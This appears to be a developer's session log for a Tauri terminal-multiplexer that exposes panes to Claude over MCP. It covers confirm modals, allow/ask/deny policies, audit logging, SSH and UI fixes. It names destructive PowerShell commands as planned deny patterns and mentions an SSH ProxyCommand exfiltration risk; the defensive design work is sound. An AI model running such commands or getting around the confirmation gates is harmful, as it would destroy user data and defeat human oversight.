Confirm modal (McpConfirm.tsx). Amber-bordered modal. Shows tool, policy reason ("default", a matched ask rule, etc.), a human-readable summary built per-tool (Rename pane "X" → "Y"), and an expandable raw-args block. Enter = accept, Esc = reject. Third button: "Always allow {tool}" — appends bare tool name to the policy allow bucket inline, then resolves the current call. Toast confirms.

Default policy is empty → every call asks. Restrictive by design; the user enables parts. Saved to %APPDATA%\com.megaproxy.tiletopia\mcp-policy.json via the same atomic tmp+rename pattern as mcp.json/hosts.json/workspace.json.

Classifier hook scaffold (no-op). PolicyClassifier trait + ClassifierHint enum + NoopClassifier in mcp_policy.rs. Not wired into evaluate() yet — placeholder for v2.1 where a small LLM (Haiku via Anthropic API, or local Ollama) classifies ambiguous Ask calls to maybe-upgrade them to Allow. Architecture supports it without further refactor.

Demo tool wired end-to-end: set_label. Pure metadata change; reuses the existing ops.setLabelchangeLabel(tree, leafId, label) path. No PTY, no SSH, no async spawn complexity. Perfect proof-of-concept for the dispatcher — every other v2 tool follows the same shape: arg struct, validate, dispatch_action with stable args_repr, frontend handler in runMcpHandler switch.

Bugs hit during integration:

  1. Tauri 2 trait-not-in-scope. AppHandle::emit moved onto tauri::Emitter trait in Tauri 2. The error message helpfully says "trait Emitter which provides emit is implemented but not in scope" — just use tauri::Emitter; next to Manager. Worth remembering for any future event-emission code.

  2. McpError constructors want 'static strings. Signature is impl Into<Cow<'static, str>>. Passing &format!(...) or &e.to_string() fails (temporary value dropped while borrowed). Pass the owned String directly — auto-converts to Cow::Owned. Bit me at three sites in dispatch_action.

  3. React 18 StrictMode race with listen(). Classic pattern bug: useEffect(() => { let un; void listen(...).then(fn => { un = fn }); return () => un?.() }, []); is broken in StrictMode because the cleanup runs before the Promise resolves on the pretend-unmount, leaving the first subscription dangling. Real-world symptom was duplicate audit entries and modal-needs-two-clicks (each event handled by both subscriptions). Fix is the cancelled-flag pattern:

    let cancelled = false;
    let unlisten;
    void listen(...).then(fn => { if (cancelled) fn(); else unlisten = fn; });
    return () => { cancelled = true; unlisten?.(); };
    

    Worth using anywhere we subscribe-via-Promise inside useEffect, not just for MCP events. Vite HMR also surfaces this if you're not careful — a clean restart confirmed the fix held.

  4. Stale state when audit subscription lived in AuditTab. AuditTab unmounts when the user switches tabs or closes the panel; events fired during that window were dropped. Lifted subscription to App.tsx, made AuditTab presentational (props in, table out). Same pattern any "always-on log" should follow.

  5. rmcp's DNS-rebinding allowlist re-bit us once. The earlier session disabled it for WSL connectivity; PR-1 didn't regress this but it's a pattern to keep flagged — StreamableHttpServerConfig::default().disable_allowed_hosts() stays mandatory for our use case.

Frontend ↔ backend contract worth saving:

  • mcp://request event payload (camelCase): {requestId, tool, args, needsConfirm, reason}
  • mcp://audit event payload: {tsMs, tool, argsSummary, result: {kind:"ok"|"denied"|"failed", ...}, durationMs}
  • mcp_action_reply Tauri command takes {requestId, result} where result is externally-tagged {Ok: value} or {Err: msg} — that's serde's default tagging for Result<T,E>, NOT a custom shape.
  • Tauri 2 command argument-name binding: JS sends {policy}, Rust receives policy: McpPolicy — direct lowercase match. McpPolicy has no #[serde(rename_all = ...)], so field keys (version, permissions, deny, ask, allow) match identity. Verified with debug-log instrumentation during the save-not-persisting investigation (it was actually working; user's first test predated the cargo rebuild).

Open follow-ups specific to this session:

  • PR-2 (next): close_pane, swap_panes, promote_pane, apply_preset. Same dispatcher shape; the apply_preset data-loss case wants an allow_drops: true arg rather than a separate modal (per the earlier scope notes).
  • PR-3 (the hard one): spawn_pane, write_pane, connect_host. Needs (a) spawn-completion oneshot resolution chain (await registerPaneId), (b) per-host SSH confirm even on spawn (Claude opening a shell on prod is equally consequential to writing to it), (c) rate limiter on write_pane (per OWASP LLM06 + MCP spec MUST).
  • PR-4: add_host + extraArgs sanitiser (ProxyCommand exfil risk for OpenSSH).
  • v2.1 classifier: wire PolicyClassifier into evaluate() so Ask calls can be auto-upgraded to Allow by a small LLM. Haiku is the cheap/fast pick; needs an API key surface in settings.
  • PowerShell hard-deny patterns (Remove-Item -Recurse -Force C:\, Format-Volume, etc.). Deferred until users actually use PowerShell panes with MCP enabled.
  • .mcpb bundle — still on the list; PR-1b's stdio-shim recipe is what it would package up.
  • Confirm modal queueing UX — currently shows one at a time, FIFO. If Claude burst-sends many tool calls, the user gets serial modals. Probably fine for v2; if it gets annoying, add a "reject all pending" button.
  • Audit log persistence — currently ephemeral ring of 200. A mcp-audit.jsonl append-only file in app data dir would let users see "what did Claude do overnight". Trade-off: secrets-in-summaries risk if write_pane text leaks past the 80-char truncation. Deferred.
  • xterm.js RenderService errors (Cannot read properties of undefined (reading 'dimensions')) showed up in dev tools during this session — completely unrelated to MCP work, likely a pane being resized or detached mid-render. File when convenient.

2026-05-26 — MCP persistence + Claude Code OAuth bug + mcp-remote shim

Set out to fix two paper cuts (port + token re-rolled every server restart, so firewall rules and .mcp.json had to be re-pasted). Ended up unwinding a multi-layer breakage in Claude Code's HTTP-MCP client.

Persistence (the actual goal, in commit 799f507):

  • Added McpPersistedConfig { port, token } saved to %APPDATA%\com.megaproxy.tiletopia\mcp.json. Default port 47821 (IANA-unassigned range). start_server tries the saved port first, falls back to OS-picked + warning log if it's taken (saved port is preserved for the next attempt — transient conflicts shouldn't burn the user's firewall rule).
  • New mcp_regenerate_token command + Regenerate button in McpPanel. Confirms before rotating (existing clients break). If server is running, stops + restarts with the new token so the live auth middleware picks it up.
  • Token loaded on every start_server, so McpState.bearer_token is always in sync with mcp.json.

The chain of failures (each fix exposed the next layer):

  1. WSL → Windows TCP timeouts. User had auto-created Windows Defender Firewall Block (Public) rules for tiletopia.exe from earlier launches. Block rules win over Allow rules in WDF. Fix: nuke all tiletopia* rules, create one Allow Any-profile LocalPort 47821 rule. Confirmed working with curl 401 from Windows + WSL.
  2. rmcp DNS-rebinding allowlist (StreamableHttpServerConfig.allowed_hosts defaults to ["localhost", "127.0.0.1", "::1"]). WSL clients hit via the gateway IP 172.x.x.1, which isn't in the list — rmcp logged rejected request with disallowed Host header. Fix: .disable_allowed_hosts() on the config. Bearer auth handles the real gatekeeping; we're not in a browser context.
  3. Bearer auth middleware intercepted OAuth-discovery probes. Claude Code probes /.well-known/oauth-protected-resource, /.well-known/oauth-authorization-server, /register, etc. before sending the static bearer. Our middleware was returning 401 + WWW-Authenticate: Bearer on those paths — Claude interpreted that as "OAuth supported" and abandoned the static bearer in .mcp.json. Fix: skip auth enforcement for any path outside /mcp (mcp.rs:bearer_auth).
  4. Claude Code's HTTP-MCP client is OAuth-only-ish. Even with discovery paths returning bare 404s, Claude's /mcp UI hung in Needs authentication, never sent a real POST /mcp, and offered an "Authenticate" button that opened a (non-existent) browser flow. Logs confirmed: not a single MCP request after MCP server listening. The headers: { Authorization: "Bearer ..." } field IS the documented mechanism, but it's broken in Claude Code per #17152 (cosmetic UI bug) and #46879 (auth requirement triggered by the existence of well-known endpoints, not by 401 responses).

The working path: mcp-remote stdio shim. Replace the HTTP server entry in .mcp.json with:

{
  "mcpServers": {
    "tiletopia": {
      "command": "npx",
      "args": [
        "-y", "mcp-remote",
        "http://127.0.0.1:47821/mcp",
        "--allow-http",
        "--header", "Authorization: Bearer <token>"
      ]
    }
  }
}

From Claude's perspective tiletopia is now stdio; mcp-remote proxies every JSON-RPC call over HTTP with the bearer baked in, bypassing Claude Code's HTTP-MCP machinery entirely. --allow-http is required because mcp-remote blocks non-HTTPS URLs except for localhost. The panel's "Copy config snippet" generates this shape now.

Cleanups after the shim worked:

  • Dropped the experimental json_not_found fallback handler (was added when we thought a JSON-bodied 404 would satisfy Claude's discovery parser; not needed once we went stdio).
  • Diagnostic tracing::info! for per-request auth state dropped to tracing::debug! (silent by default, available behind RUST_LOG=tiletopia_lib::mcp=debug).
  • README + help-overlay tip rewritten around the shim recipe + WSL firewall + WSL gateway-IP / mirrored-networking choice.

Root-cause sequence worth remembering: five distinct failures masked each other, and each new error message looked like a config bug. Methodical curl-from-WSL + log inspection was what cut through it — never trust the client's "auth failed" string without seeing whether the server was even reached.

Open follow-ups specific to this session:

  • CLAUDE.md (root) still says Svelte 5 in stack — was noted in 2026-05-25's entry too; still not fixed.
  • .mcpb bundle would let Claude Desktop install the shim + bearer without hand-editing .mcp.json. Was already in the previous MCP TODO list; this session reinforces the need.
  • Direct HTTP-MCP can drop the shim once Claude Code fixes #17152 / #46879. Worth watching those issues.
  • Panel could pre-flight check for npx / Node presence on the WSL/host side and warn if missing. Currently the user only discovers the shim needs Node when Claude fails to spawn it.
  • Server-side OAuth metadata (RFC 9728 PRM at /.well-known/oauth-protected-resource) is the spec-blessed path but requires actually implementing OAuth dynamic client registration. Big scope; not worth it for the shim's lifetime.

2026-05-25 — Reflow bug fix + titlebar tidy-up

  • Bug: terminal text reflowing every few seconds. User reported "redrawing every few seconds" with text changing lines. Added a console.trace inside the ResizeObserver in XtermPane.tsx, then expanded the diagnostic to log titlebar/pane-wrap/leaf/toolbar heights. Caught it: titlebar was oscillating between 34px and 50px in sync with pane heights changing by ±15.4px (one button-row).
  • Root cause: text-wrap inside flex buttons. Titlebar is display: flex with default flex-wrap: nowrap. Buttons have no white-space: nowrap. On a narrow window, flex items shrink past their natural width → text wraps inside a button (e.g. "📡 all off" → two lines) → button grows ~16px → titlebar grows ~16px → .pane-wrap shrinks → ResizeObserver fires on every xterm → fit() reflows. The periodic flap was idle detection: when idleLeafIds.size toggles between 0 and N, .layout-info gains/loses " · N idle", which is just enough extra width to push a button across its wrap threshold. Same root cause on narrow per-pane toolbars (tlb=37 was visible in the diagnostic for a 200px pane).
  • Fix: lock heights on both bars. .titlebar { height: 34px; white-space: nowrap; } + .titlebar > * { flex-shrink: 0 }; same shape for .pane-toolbar { height: 24px; ... }. First attempt also used overflow: hidden which left an ugly horizontal scrollbar (auto) AND would have clipped dropdowns — removed. Final: nowrap + flex-shrink:0 + fixed height is enough; overflow stays visible. Commit e464464.
  • Titlebar tidy-up. Pre-fix titlebar was crowded (inline distro buttons + PowerShell + 🔑 SSH hosts + 5 preset buttons + others). Collapsed:
    • Inline shell buttons → single Ubuntu ▾ dropdown (WSL + Windows sections), reusing the existing .distro-menu / .shell-menu styles from LeafPane.css (global classes).
    • 5 preset buttons → layout ▾ dropdown (Single pane / Two columns / Three columns / Two rows / 2×2 grid).
    • 🔑 stays as a separate icon-only button next to the shell picker.
    • 🔔 test-toast button removed (dev crutch).
  • + spawn button. User pointed out "default:" semantics were weak — the picked shell only fired on first-boot or close-last-pane. Repurposed: dropped the "default:" label, added a + button next to the picker. Click + → splits the active pane with the currently-picked shell, smart-oriented (split right if pane is wider than tall, down otherwise). Per-pane ⇥/⇣ arrows still inherit from parent (best for "another window into this context"); the titlebar selection only fires on + / boot / close-last. Commit fa18307.

Open follow-ups from this session:

  • CLAUDE.md still names Svelte 5 in the stack; should be updated to React 18.
  • Keyboard shortcut for +? Currently mouse-only. Ctrl+Shift+N would be the conventional choice but isn't bound.
  • Narrow window UX. With overflow: visible, titlebar items that don't fit horizontally render past the right edge / get clipped by the viewport. Acceptable but not great. A real fix is to collapse less-important items into an overflow menu when width is tight.

Big session, ~12 commits. Headlines:

  • PowerShell as a third shell kind alongside WSL distros, then refactored to an explicit shellKind: "wsl" | "powershell" | "ssh" discriminator on LeafNode with migration on deserialize (legacy distro:"PowerShell"shellKind:"powershell").
  • Backend SpawnSpec enum (serde-tagged) replaces the old distro: Option<String> model. pty.rs::spawn dispatches; SSH builds ssh.exe -t [-l user] [-p port] [-i id] [-J jump] -- host with TERM=xterm-256color. Token validation rejects leading - and control chars (CVE-2023-51385).
  • Clickable URLs via @xterm/addon-web-links routed through @tauri-apps/plugin-opener. Needed scoped opener:allow-open-url permission with http/https/mailto allow list, not the bare identifier.
  • Saved SSH hosts with manager modal (label/host/user/port/identityFile/jumpHost/extraArgs), stored in hosts.json. Hierarchical per-pane dropdown: WSL distros → PowerShell → SSH hosts → "Manage hosts…".
  • Saved passwords in Windows Credential Manager via keyring-core 1.0 + windows-native-keyring-store 1.0 (keyring-rs 4.x is sample code only now; the lib was split). Reader thread autotypes the password when ssh prompts (password:/passphrase regex, 30s window, one-shot). Passwords never on disk, never in IPC events, never in MCP.
  • Promote-out gesture: first tried drag-past-sibling (75% then 50% threshold), but the inner gutter is too easy to miss — xterm canvas hit-testing felt unreliable. Ripped all the drag-armed/preview logic, replaced with Ctrl+Shift+P keyboard shortcut that calls promoteLeaf(tree, activeLeafId) (self-inverse).
  • Help overlay: titlebar ? button + F1, sourced from a single src/lib/shortcuts.ts SoT (sections + tips).
  • MCP server v1 (read-only) via rmcp 1.7.0 Streamable HTTP on 127.0.0.1, bearer-token auth, OS-picked port. Per-pane mcpAllow flag (default-deny) gates what's mirrored to the backend. Resources: tiletopia://layout, tiletopia://panes, tiletopia://hosts. Tools: read_pane(leaf_id, last_lines, after_seq) + wait_for_idle(leaf_id, idle_ms, timeout_ms). 256 KB per-pane scrollback ring populated by the PTY reader thread. Titlebar 🤖 toggle opens an McpPanel with URL + token + ready-to-paste Claude config snippet.
  • WSL → Windows networking gotcha: WSL2 default NAT mode hides Windows 127.0.0.1. User needs networkingMode=mirrored in %UserProfile%\.wslconfig (Win 11 22H2+) then wsl --shutdown to reconnect. Documented in McpPanel + README + help overlay.
  • Tree-helper data model also gained: setLeafShell (replaces changeDistro for shell switches; id-swap forces respawn), promoteLeaf, toggleMcpAllow. reshapeToPreset carries new fields. 72 vitest cases, all green.

Open follow-ups specific to this session:

  • MCP v2write_pane, spawn_pane, connect_host, close_pane, apply_preset, promote_pane, set_label, swap_panes, add_host. Spawned panes should auto-set mcpAllow=true (per user). Still skip set_host_password from MCP.
  • MCP write surface should require a confirmation for write_pane on SSH panes (footgun avoidance).
  • .mcpb bundle as a one-click Claude Desktop install path.
  • Per-pane MCP audit log in the panel — show last N tool calls so the user can spot Claude doing surprising things.

2026-05-22 — M5 ship infrastructure

  • New icon: scripts/make-icon.py (Pillow) draws a 1024×1024 dark rounded square with a 2×2 grid — one tile in the active-blue, one in the broadcast-orange, two muted. Mirrors the in-app .leaf.active / .leaf.broadcasting colors so the brand is consistent end-to-end.
  • Generated the full icon set via pnpm tauri icon src-tauri/icons/source.png. Pruned the iOS/Android/UWP outputs Tauri also emits — kept only 32x32.png, 128x128.png, 128x128@2x.png, icon.icns, icon.ico, source.png (mirrors widget's slim set).
  • Version bump 0.0.1 → 0.1.0 across package.json, src-tauri/Cargo.toml, src-tauri/tauri.conf.json. First "real" release.
  • scripts/release.sh: takes vX.Y.Z, sanity-checks (clean tree, on main, in sync with origin, package.json version matches tag, installer exists, tag doesn't already exist), tags + pushes, then tea releases create --asset <installer> to attach the NSIS .exe.
  • README rewritten with Install section pointing at Forgejo releases, Using it cheatsheet for all the M2-M4 features, and a Develop/Test/Release triplet that documents the WSL↔Windows split.

2026-05-22 — Tests: vitest on tree.ts

  • Added vitest 2.x as a devDep; pnpm test / pnpm test:watch scripts.
  • Extended vite.config.ts with a test: block (node environment, src/**/*.test.ts) using vitest/config-flavored defineConfig.
  • New src/lib/layout/tree.test.ts: 43 cases covering newLeaf/newSplit (defaults + props), replaceById (immutability + sibling preservation), splitLeaf (inheritance + no-op on miss), closeLeaf (root/sibling-collapse/nested), findLeaf, leafCount, walkLeaves (left-to-right order), changeDistro (MUST swap id), changeLabel (MUST NOT swap id, trim/clear), toggleBroadcast (MUST NOT swap id), all 5 presets (shape + distro propagation + fresh ids), serialize/deserialize roundtrip + invalid-input rejection.
  • Notable invariants the tests pin down: changeDistro swaps the leaf id (we rely on {#key} to remount XtermPane → kill the old PTY → spawn a fresh one); changeLabel and toggleBroadcast keep the same id (metadata-only, no respawn). Regressing either of those silently would break the UX in subtle ways — tests catch it.

2026-05-22 — M4 orchestration (broadcast + notifications + palette)

  • tree.ts: added broadcast?: boolean to LeafNode; walkLeaves generator; toggleBroadcast helper (metadata-only, no id swap).
  • ops.ts: extended PaneOps with toggleBroadcast, broadcastFrom, setActivePane, registerPaneId, notify, plus activeLeafId data field.
  • XtermPane.svelte: added optional callbacks onSpawn, onInput (called after each writeToPane on user keypress), onDataReceived (called per PTY output chunk), and a focusTrigger prop (counter; bumping it refocuses the terminal). All optional; pre-M4 callers untouched.
  • LeafPane.svelte: 📡 broadcast toggle in toolbar; idle detection (5s threshold, 1s polling, fires once per idle cycle); active/broadcasting border colors; click anywhere on the leaf sets it active; on active=true bumps focusTrigger so XtermPane refocuses.
  • New Notifications.svelte: top-right toast stack, slide-in animation, 5s auto-dismiss + manual ×.
  • New Palette.svelte: modal overlay with backdrop, autofocused text input, filtered list (label/distro/cwd substring), ↑/↓ navigation, Enter/click to pick, Escape to close.
  • App.svelte: paneIdByLeaf Map (non-reactive lookup); notifications $state with auto-dismiss; activeLeafId; paletteOpen with global Ctrl+K listener; broadcastFrom routes via walkLeaves + writeToPane; ⌘K button in titlebar.
  • pnpm check clean (111 files).

2026-05-22 — M3 persistence + presets + per-pane distro/label

  • Backend: added save_workspace(json) and load_workspace() Tauri commands. Atomic write via tmp + rename. Path resolved from app.path().app_config_dir().
  • Frontend ipc: saveWorkspace / loadWorkspace wrappers.
  • tree.ts: added changeDistro (with id swap to force XtermPane remount), changeLabel, and 5 preset trees (single, 2H, 3H, 2V, 2×2).
  • New lib/layout/ops.ts with PaneOps interface; refactored Pane.svelte / SplitNode.svelte / LeafPane.svelte to take ops instead of individual callbacks.
  • LeafPane.svelte: in-toolbar pane-label editor (click to rename, Enter saves, Esc cancels) and distro chip with click-popover. Picking a different distro in the popover respawns the pane.
  • App.svelte: migrated to APPDATA persistence with 500ms debounce. One-time localStorage→APPDATA migration on boot. Split inherits parent's distro+cwd via findLeaf. Titlebar preset buttons (1 / 2H / 3H / 2V / 2×2) with a confirm prompt when replacing >1 pane.
  • pnpm check clean (109 files, 0 errors, 0 warnings).
  • Manual verification on Windows: (to fill in)

2026-05-22 — M2 splits-tree layout

  • Added src/lib/layout/: tree.ts (pure helpers: types, newLeaf, splitLeaf, closeLeaf, replaceById, serialize/deserialize with shape-checking), SplitNode.svelte (flex container + draggable gutter with pointer-capture), LeafPane.svelte (toolbar with split-right/split-down/close + XtermPane underneath), Pane.svelte (recursive dispatcher).
  • Rewrote App.svelte to hold the tree as $state and wire split/close callbacks through. Auto-saves to localStorage on every $effect tick.
  • Distro UX: titlebar shows clickable distro buttons that set the default for new panes. Existing panes keep their distro. Per-pane override is M3.
  • Passes pnpm check cleanly (108 files, 0 errors, 0 warnings).
  • Validated manually on Windows: splits-right and splits-down work, both panes stay alive, gutter drag reflows both xterm sides cleanly, close-pane collapses to the sibling, layout restores from localStorage across window restarts.

2026-05-22

  • Graduated from ideas/wsl-mux/ to project. Renamed working name wsl-mux → final name tiletopia across Cargo/package/Tauri configs and source.
  • Promoted spike contents from D:\dev\wsl-mux\spike\ to D:\dev\tiletopia\ (no more spike subdir; the project IS what was the spike).
  • Initialized git, created private Forgejo repo tiletopia, pushed initial scaffold.
  • M1 verified manually on the Windows host: window opens, xterm.js renders, claude TUI works inside the pane, resize reflows cleanly, htop renders. Distro auto-pick chose docker-desktop (Docker Desktop's BusyBox helper distro) on first try — added explicit clickable distro buttons in the titlebar as both a diagnostic and a manual override. Clicking Ubuntu works end-to-end.
  • Old idea folder archived to ~/claude/archive/ideas/wsl-mux/ (preserves full brainstorm + session log).

External references

  • Approved plan / roadmap: ~/.claude/plans/imperative-coalescing-feigenbaum.md (M0M5 milestones with verification criteria for each)
  • Stack precedent: ~/claude/projects/claude-usage-widget/ — same Tauri + Svelte + WebView2 toolchain, already ships a Windows installer via Forgejo releases. WSL distro-probing logic copied/adapted into src-tauri/src/pty.rs.
  • Archived idea history: ~/claude/archive/ideas/wsl-mux/plan.md
  • Forgejo repo: https://git.rdx4.com/megaproxy/tiletopia
  • xterm.js docs: https://xtermjs.org/
  • portable-pty crate: https://crates.io/crates/portable-pty
  • Tauri 2 docs: https://v2.tauri.app/
  • Prior art for splits-tree layout: i3, tmux, Zellij, WezTerm